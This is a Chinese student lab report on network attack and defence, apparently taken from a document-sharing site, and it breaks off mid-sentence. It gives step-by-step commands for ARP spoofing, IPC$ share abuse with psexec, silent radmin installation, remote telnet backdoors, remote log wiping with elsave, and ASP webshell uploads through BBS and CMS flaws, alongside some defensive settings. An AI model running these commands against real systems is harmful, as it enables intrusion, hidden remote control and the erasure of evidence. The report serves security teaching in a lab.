信息安全实验报告.docx
《信息安全实验报告.docx》由会员分享,可在线阅读,更多相关《信息安全实验报告.docx(53页珍藏版)》请在冰豆网上搜索。
信息安全实验报告
网络安全技术
实验报告
专业:
计算机网络技术
学号:
姓名:
WHY
指导教师:
项目一漏洞扫描
【实验目的】
掌握漏洞扫描技术原理
了解常见的系统漏洞及防范方法
掌握典型的综合扫描工具
【实验环境】
Windowsserver2003
本地主机(WindowsXP)
【实验内容】
FTP弱口令设置
利用X-Scan工具进行扫描
【实验步骤】
(1)漏洞扫描实验中,由于扫描工具的本身的局限性不能在物理网卡上设置多个ip地址,请确保单IP环境。
(2)启动实验实施面板对目标主机(选择启动Windows实验台为目标主机)进行FTP漏洞扫描,查看结果。
可以发现目标主机的FTP服务存漏洞扫描信息安全实验教学系统实验指导书在允许匿名登录以及允许写入的问题。
(3)在目标主机打开IIS服务器,右键点击“默认FTP站点”,选择“属性”,设置不允许写入权限。
再次扫描目标主机的FTP漏洞,发现允许写入漏洞已不存在。
(4)如图4.6-7所示,在目标主机上再取消掉默认FTP站点的“允许匿名连接”,再次扫描并分析结果,扫描结果如图。
【实验思考】
为什么关闭FTP匿名登录后,无法发现“在线及相应的主机”?
试试其它漏洞扫描选项,分析一下结果并尝试自己解决安全注意或漏洞。
项目二发起攻击——数据嗅探
【实验目的】
了解ARP欺骗在网络攻击中的应用
掌握典型的嗅探工具的使用
获得网络传输过程中的敏感信息
【实验环境】
WindowsXP、WindowsServer2003
协议编辑软件
【实验内容】
搭建网络实现ARP地址欺骗过程
防范ARP地址欺骗
【实验步骤】
一、设定环境(在实验中应根据具体实验环境进行实验)
(1)根据环境拓扑图设定网络环境,并测试连通性。
(2)需要使用协议编辑软件进行数据包编辑并发送。
二、主机欺骗
(1)启动windows实验台,Ping网关。
(2)在HostBIP为172.20.1.178的主机上使用arp–a命令查看网关的arp的列表。
通过上面命令可以看到真实网关的MAC地址为00-22-46-07-d4-b8,可以通过发送ARP数据包改变客户机的ARP列表,将网关的MAC地址改变00-22-46-04-60-ac。
(3)从工具箱中下载工具,编辑ARP数据包,模拟网关路由器发送ARP更新信息,改变主机ip为172.20.1.178的主机的arp列表。
首先打开协议编辑软件(需要先安装Wireshark工具),点击菜单栏“添加”,如下图所示。
(4)添加一个ARP协议模板,将时间差设置为3毫秒,点击确认添加,如下图所示。
(5)修改协议模板的每个值
EthernetII封装:
l目标物理地址:
FF-FF-FF-FF-FF-FF
l源物理地址:
00-24-81-36-00-E8
l类型:
0806
ARP封装:
l硬件类型:
1
l协议类型:
800
l硬件地址长度:
6
l协议地址长度:
4
l操作码:
1
l发送物理地址:
00-22-46-04-60-AC
l发送送IP地址:
172.20.0.1
l目的物理地址:
00-24-81-36-00-E8
l目的IP地址:
172.20.1.178
(6)编辑完成并经过校验的数据包。
(7)编辑并校验完成后,点击发送按钮,如图。
(8)在HostB上使用命令arp–a命令来查看arp表项,如图。
此时,所有向外发送的数据包,都会被转发到攻击者的主机上,从而获得敏感信息。
用命令arp–d命令来清空ip,以便后续实验的进行。
【实验思考】
如何防止ARP欺骗
如果受到了ARP欺骗如何破解这种欺骗并保持正常网络环境
项目三发起攻击----IPC$管道的利用与远程控制
【实验目的】
了解IPC$漏洞原理
掌握IPC$漏洞攻击方法
掌握psExec工具的使用
掌握远程控制工具radmin的使用
【实验环境】
WindowsXP
WindowsServer2003
【实验内容】
映射默认共享
上传恶意程序
远程控制
删除默认共享
【实验步骤】
一、打开被攻击机即目标主机的IPC$默认共享
启动实验台,以实验台为被攻击机即目标主机。
利用IPC$漏洞实施攻击,首先要保证被攻击机的IPC$默认共享已经打开。
在Win2003操作系统中admin$,IPC$,C$默认打开,而在WinXP中根据不同版本有所不同。
可用netshare命令查看,如图。
如果没有打开,可以在主机上运行命令开启,如图。
二、利用以下命令与远程主机建立IPC连接
netuse\\远程主机ip“密码”/user:
“用户名”与目标主机建立IPC$连接通道netusez:
\\远程主机IP\c$将目标主机的C盘影射为本地Z盘copye:
\a.txt\\远程主机ip\c$拷贝本地文件e:
\a.txt到目标主机netuse\\远程主机ip/del删除与目标主机的IPC$连接具体如图(下图中目标主机地址、用户名、密码为演示值,实验时请以目标主机实际值为准)。
将对方的C盘映射为本地的Z盘,则可以像操纵本地硬盘一样对目标主机C盘进行操作。
三、攻击实施
现在的目标就是在对方不知道的情况下安装并运行软件。
(1)实验工具箱中取得实验工具radmin,将其中的r_server.exe、raddrv.dll、AdmDll.dll拷贝粘贴到映射的z盘,即远程主机的C盘。
(2)利用psexec工具获得对方的Shell,命令如下:
psexec\\远程主机ip–u用户名–p密码cmd.exe;这里的-u和-p参数分别指定远程主机的用户名和密码,cmd.exe是远程主机的命令行程序。
执行成功之后就获取到了目标主机的Shell,通过下图可以看到ipconfig命令已经在远程主机上执行了,获得的是对方主机的IP地XXX.XXX.XXX.19。
如图。
(3)在得到的远程主机Shell上安装r_server,命令如下:
C:
\r_server/install/pass:
密码/port:
端口/silence。
其中密码可指定为123,此实验中没有用到。
通过/port参数指定端口号,默认是4899。
/silence参数表示静默安装,否则会在目标主机上出现安装的窗口,这是攻击者不希望看到的。
(4)启动r_server服务netstartr_server(注:
如提示服务名称无效,则需运行两次或多次),如图。
(5)攻击者在本地运行Radmin的客户端radmin.exe,从菜单栏选择连接选项-连接到…,输入目标主机的IP地址和安装r_server时指定的端口号点击确定,建立一个到目标主机的连接,如图。
(6)连接建立成功之后就可以看到目标主机的桌面,并能控制目标主机。
可在客户端软件中选择连接模式,其中完全连接权限最大。
四、防御措施
这种攻击的根源在于IPC$默认共享的打开。
如果被攻击机上不存在默认共享,即admin$、IPC$、C$等是关闭的,那么类似的攻击就不会成功。
可以通过如下命令关闭已打开的共享。
netshareadmin$/delete
netsharec$/delete
(1)关闭IPC$和默认共享依赖的服务:
server服务
控制面板/管理工具/服务/找到server服务(右击)/属性/常规/启动类型/选已禁用,这时可能会有提示说:
XXX服务也会关闭是否继续,因为还有些次要的服务要依赖于server服务,不理睬,继续关闭。
(2)屏蔽139,445端口
由于没有以上两个端口的支持,是无法建立IPC$的,因此屏蔽139,445端口同样可以阻止IPC$入侵。
在做实验的时候,经常会遇到这个问题:
对于是WindowsXP系统的目标机,假设已经扫描得到用户帐号和口令,而且可以连接,但不能复制东西,显示错误5。
这是因为XP的安全策略的默认设置中,对本地帐户的网络登录进行身份验证的时候,默认为来宾权限,即使你用管理员远程登录,也只具有来宾权限,因此你复制文件,当然是错误5:
权限不够。
解决方法是:
设置/控制面板/管理工具/本地安全策略/本地策略/安全选项/网络访问/本地帐户的共享和安全模式中,将来宾改为经典(用户以自己身份认证)。
此外,如果admin$未打开,虽然可以建立IPC$通道,但是PsExec不能正常运行。
【实验思考】
netuse命令使用报告
psexec命令使用报告
radmin软件使用报告
截图,同时显示本机IP和远程被控制主机桌面内容
项目四后门种植——Telnet服务开启
【实验目的】
掌握Telnet服务的原理
掌握Telnet服务的工作过程
【实验环境】
WindowsXP
WindowsServer2003
【实验内容】
本地开启Telnet服务,更改Telnet设置
远程开启Telnet服务,更改Telnet设置
【实验步骤】
一、关闭实验台telnet服务
运行实验台,依次打开开始—>控制面板—>管理工具—>服务,找到Telnet服务,停止telnet服务,然后将其启动类型改为禁用。
二远程开启telnet服务:
(1)首先用流光嗅等工具探得到对方密码,主要是弱口令(此步可跳过,用已知的实验台用户名密码进行试验)。
(2)用netuse命令建立ipc$连接例如:
netuse\\实验台IP\ipc$"实验台密码"/user:
administrator
(3)用sc命令把禁用的telnet服务变成自动sc\\实验台IPconfigtlntsvrstart=auto
在实验台可以查看telnet的启动类型已经变为自动:
(4)用sc命令将telnet启动sc\\实验台IPstarttlntsvr
在实验台可以查看telnet服务已经启动:
(5)新建一个cmd环境进行telnet登录,telnet实验台IP
telnet连接建立之后,可输入用户名密码等相关信息进行登陆telnet服务登录到远程主机:
(6)登陆后便可进行共享等相关操作,netshare建立c$共享netshareabc$=c:
查看共享目录:
netshare
(7)远程更改telnet端口
输入tlntadmn\\实验台IPconfigport=1000-uadministrator-p实验台密码
再次进行telnet连接,则使用端口1000。
【实验思考】
如何防止Telnet被远程开启。
项目五清楚痕迹
【实验目的】
掌握常见服务的日子记录位置
阅读常见服务产生的日志
掌握系统日志、服务日志和计划任务日志的清理方法
【实验环境】
WindowsXP
WindowsServer2003
【实验内容】
查看常用服务和系统的日志
利用工具清理系统日志
手动清楚常用服务日志
【实验步骤】
一、日志查看
(1)启动Windows实验台,点击:
开始–设置–控制面板–管理工具-事件查看器
(2)应用程序日志、安全日志、系统日志、DNS日志默认位置:
%systemroot%\system32\config,默认文件大小512KB,管理员可以改变这个默认大小。
安全日志文件:
%systemroot%\system32\config\SecEvent.EVT;
系统日志文件:
%systemroot%\system32\config\SysEvent.EVT;
应用程序日志文件:
%systemroot%\system32\config\AppEvent.EVT;
DNS日志:
%systemroot%\system32\config\DnsEvent.EVT;
在事件查看器中右键应用程序(或安全性、系统、DNS服务器)查看属性可以得到日志存放文件的路径,并可修改日志文件的大小,清除日志。
选中事件查看器中左边的树形结构图中的日志类型(应用程序、安全性或系统),右击“查看”,并选择“筛选”。
或者点击属性页面的筛选器标签,日志筛选器将会启动。
通过筛选器系统会过滤出管理员希望查看的日志记录。
(3)查看www和ftp日志文件夹下的日志文件
当我们尝试对www服务中某一文件进行访问,则日志中则会有相应的日志记录如下图。
日志中记录了访问www服务的请求地址,管理员可以根据请求地址,发现网络上的攻击,管理员可根据日志信息,采取一定的防护措施。
ftp的日志中同样会记录ftp服务的登陆用户,以及登陆之后的操作。
(4)计划任务日志
当入侵者得到远程系统的shell之后,常会利用计划任务运行功能更加强大的木马程序,计划任务日志详细的记录的计划任务的执行时间,程序名称等详细信息。
打开计划任务文件夹,点击“高级”-查看日志,即可查看计划任务日志。
二、日志清除
(1)删除事件查看器中的日志
学生主机下载使用elsave清除日志工具
先用ipc$管道进行连接,在cmd命令提示符下输入netuse\\对方IP(实验台IP)\ipc$"密码"/user:
"用户名";
连接成功后,开始进行日志清除。
清除目标系统的应用程序日志输入elsave-s\\对方ip-l"application"-C
清除目标系统的系统日志输入elsave-s\\对方IP-l"system"-C
清除目标系统的安全日志输入elsave-s\\对方IP-l"security"-C
输入如下图
回车后可以查看远程主机内的系统日志已经被删除了
(2)删除常见服务日志
IIS的日志功能,它可以详细的记录下入侵全过程,如用unicode入侵时IE里打的命令,和对80端口扫描时留下的痕迹。
手动清除:
日志的默认位置:
%systemroot%\system32\logfiles\w3svc1\,默认每天一个日志。
进入到远程主机后(也可直接在实验台中操作),cmd下切换到这个目录下,然后del*.*。
或者删除某一天的日志。
如果无法删除文件,首先需要停止w3svc服务,再对日志文件进行删除,使用net命令停止服务如下:
C:
\>netstopw3svc
WorldWideWebPublishingService服务正在停止。
WorldWideWebPublishingService服务已成功停止。
日志w3svc停止后,然后清空它的日志,del*.*
C:
\>netstartw3svc
清除ftp日志,日志默认位置:
%systemroot%\system32\logfiles\msftpsvc1\,默认每天一个日志,清除方法同上。
(3)删除计划任务日志
先来删除计划任务日志:
在实验台中命令行进入日志所在文件夹下(%systemroot%\Tasks),删除schedlgu.txt,提示无法访问文件,因为另一个程序正在使用此文件。
说明服务保护,需要先把服务停掉。
命令行中输入netstopschedule;
下面的服务依赖于TaskScheduler服务。
停止TaskScheduler服务也会停止这些服务。
RemoteStorageEngineTaskScheduler服务正在停止.TaskScheduler服务已成功停止。
如上显示服务停掉了,同时也停掉了与它有依赖关系的服务。
再来删除schedlgu.txt;删除后需要再次启动该任务以便主机能够正常工作,输入netstartschedule:
【实验思考】
还有哪些途径可以发现网络中存在的攻击或者入侵。
清理日志能否把所有的痕迹都清理干净。
项目六Web安全攻防实验
【实验目的】
了解对WEB网站攻击的常用方式
熟悉掌握攻击过程运用的知识
掌握对该漏洞的防护与解决办法
【实验环境】
Windows实验台
【实验内容】
密码的md5暴力破解
BBS论坛数据库备份管理
ASP脚本后门
通过对服务器的相关设置来防御黑客入侵行为
【实验步骤】
一、攻击实验一
(一)扫描主机
首先得到主机的IP地址,对主机进行常用端口扫描。
查看主机开放了那些服务,例如ftp,Web,Sql等服务。
再针对不同服务的漏洞,对其进行攻击。
常用的扫描工具如X-scan。
使用X-scan对主机进行扫描。
从如图所示的扫描结果可以看到,远程主机开放80端口,80端口为WEB服务。
或者直接访问主机的Web页面,寻找漏洞点。
例如当网站采用常见开源BBS,则可利用BBS的公开漏洞进行测试和学习。
(二)扫描漏洞
尝试默认数据库下载(http:
//实验台IP/page6/data/dvbbs6),如图。
如果BBS管理员采用默认的数据库存放位置,则很容易被攻击者获得,从而得到系统所有用户的用户名信息。
扫描得到的漏洞通常为:
默认用户与密码;默认的数据库位置,例如:
data/dvbbs6.mdb;BBS漏洞。
(三)破解口令
数据库中保存了用户名与密码,但密码是经过md5算法加密的,所以我们需要使用md5反向破解软件,或者通过网站查询的形式。
得到最终的管理员的真实密码。
在地址栏中输入http:
//实验台IP/Page6/tongji.asp?
orders=2&N=10%20userpassWord,显示2个用户的密码,被MD5进行了加密,如图。
得到用户密码的MD5值,登陆MD5破解网站,输入MD5值,得到密码,如图6.4-5所示,即默认用户名admin密码admin888。
(四)上传后门
修改asp木马(在工具箱里下载save.asp木马)的文件名为XX.jpg。
然后发表话题(必需先建好板块,然后才能发表新帖),上传改名后的jpg文件。
(五)登录后台
使用破解后的论坛管理员密码登录管理后台,管理界面如图6.4-7所示;首先以admin角色登录,点击“管理”。
(六)修改木马文件
上传的木马文件改后缀为jpg,所以无法直接访问,要使asp运行,必须将文件后缀改为asp,并访问运行asp脚本。
点击“文件管理”,查看上传后的jpg文件路径,并将文件路径复制下来。
利用数据库备份漏洞对上传的jpg文件进行改名,点击“备份数据库”,输入已上传的jpg文件,备份数据库名称须填写为改后缀为asp的文件。
点击确定,jpg文件将会被修改为asp文件,根据路径,将会访问asp木马,如图,达到进一步控制主机的目的。
二、攻击实验二
此实验是讲解动易2006上传漏洞的利用方法,此入侵方法利用了Win2003存在的一个文件解析路径的漏动,具体步骤如下:
(一)注册用户
打开主页面(http:
//实验台IP/index.asp),然后注册一个以“.asp”结尾的用户,如图
只需要将用户名填写为xxx.asp即可,其它信息可以任意填写,如图
(二)访问上传页面
由于动易2006有一些检测功能,所以将asp脚本木马的后缀修改为.jpg的形式进行上传不可行(上传路径:
http:
//实验台IP/user/Upload.asp?
dialogtype=UserBlogPic&size=5),会出现如图的提示。
用画图工具产生一副全新的图片;然后使用记事本打开,如图
使用记事本打开asp脚本木马(从工具箱中下载的“火狐免杀小马”),将其代码全部拷到图片里(在原始数据之后粘贴,注意文件大小不能超过100k),产生如图的新文件。
生成的新asp脚本木马
生成了新的图片asp脚本木马之后,将其上传到服务器上面(上传路径:
http:
//实验台
IP/user/Upload.asp?
dialogtype=UserBlogPic&size=5),如图
(三)浏览上传成功的asp脚本木马
上传成功之后,通过查看页面源文件(查看-源文件),得到上传文件的地址
用记事本打开asp脚本木马(通过工具箱下载的“火狐NEWWEBSHELL8.0.asp”),将其所有代码拷到输入木马的内容文本框中,在保存文件的路径设置为当前文件绝对路径的相同目录下,点击保存。
打开上传的asp木马显示WebShell登录页面。
输入登录密码(默认为admin),获取shell。
三、防御实验
(一)防止数据库下载
在IIS中添加一个.mdb的解释器即可,原因是因为IIS在处理页面时,是先得知相关的文件的后缀,然后将该后缀的文件交由相应的解释器进行解释(比如.asp的页面,就交由asp.dll解释),最后再将解释之后的结果返还给用户,也就是说用户通过IE浏览器看见的页面,是IIS处理后的最终结果,那么我们添加一个.mdb的解释器后,所有用户提交的浏览.mdb的请求,
IIS将交由该解释器进行解释,即便用户通过其它方法下载回本地,也是无法浏览的。
如图在IIS中给.mdb文件添加解释器,注意不要使用asp.dll对.mdb文件进行解释。
(二)单一站点,单一用户,防止旁注单一的站点单一的用户,这个方法是针对虚拟主机的服务商而言的,如果所有站点都是使用的同一个用户(IUSR_机器名),那黑客拿下一个站点的权限,就将整个虚拟主机上的站点
都被人拿到了,那损失就大了,具体的设置方法如下:
(1)首先建立一个guests组的用户,比方说站点为aaa那么我们就建立一个aaa的用户,密码也为aaa(这是为了方便自己日后管理,免得站点多了,密码忘记了),将这个用户从users组删除并且加入到guests组,相关命令如下:
netuseraaaaaa/add
netlocalgroupusersaaa/del
netlocalgroupguestsaaa/add
(2)然后将上面建立的用户分别应用到与根目录上
aaa用户对于aa